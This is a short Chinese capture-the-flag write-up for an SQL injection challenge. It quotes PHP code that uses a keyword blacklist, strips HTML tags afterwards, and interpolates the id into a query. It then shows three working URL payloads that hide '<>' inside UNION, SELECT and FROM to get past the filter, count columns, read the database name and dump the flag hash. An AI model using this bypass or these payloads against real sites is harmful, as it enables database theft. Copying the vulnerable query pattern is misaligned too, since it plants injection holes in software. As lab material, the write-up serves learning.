SQL注入测试
访问参数为:?id=x
查找表为key的数据表,id=1值hash字段值
以下为其中一段代码:
//过滤sql $array = array('table','union','and','or','load_file','create','delete','select','update','sleep','alter','drop','truncate','from','max','min','order','limit'); foreach ($array as $value) { if (substr_count($id, $value) > 0) { exit('包含敏感关键字!'.$value); } } //xss过滤 $id = strip_tags($id); $query = "SELECT * FROM temp WHERE id={$id} LIMIT 1";
当前结果:
id | 1 |
title | title |
定义和用法
strip_tags() 函数剥去字符串中的 HTML、XML 以及 PHP 的标签。
注释:该函数始终会剥离 HTML 注释。这点无法通过 allow 参数改变。
注释:该函数是二进制安全的。
明白了这个函数的作用就简单了 这个函数会剥离html标签 所以我们只用写注入语句时加入html标签就可以绕过注入检测所以步骤如下:
1.首先判断有多少列
http://103.238.227.13:10087/?id=1%20unio%3C%3En%20%20sele%3C%3Ect%201,2%23
通过测试可知一共有两列
2.爆出数据库名字
http://103.238.227.13:10087/?id=1%20unio%3C%3En%20%20sele%3C%3Ect%20database(),2%23
通过这一步可以得到数据库名字为sql3
3.搜到flag
http://103.238.227.13:10087/?id=1%20unio%3C%3En%20%20sele%3C%3Ect%20hash,2%20fro%3C%3Em%20%20sql3.key%23
得到flag为c3d3c17b4ca7f791f85e#$1cc72af274af4adef
如有疑问请联系QQ:834368404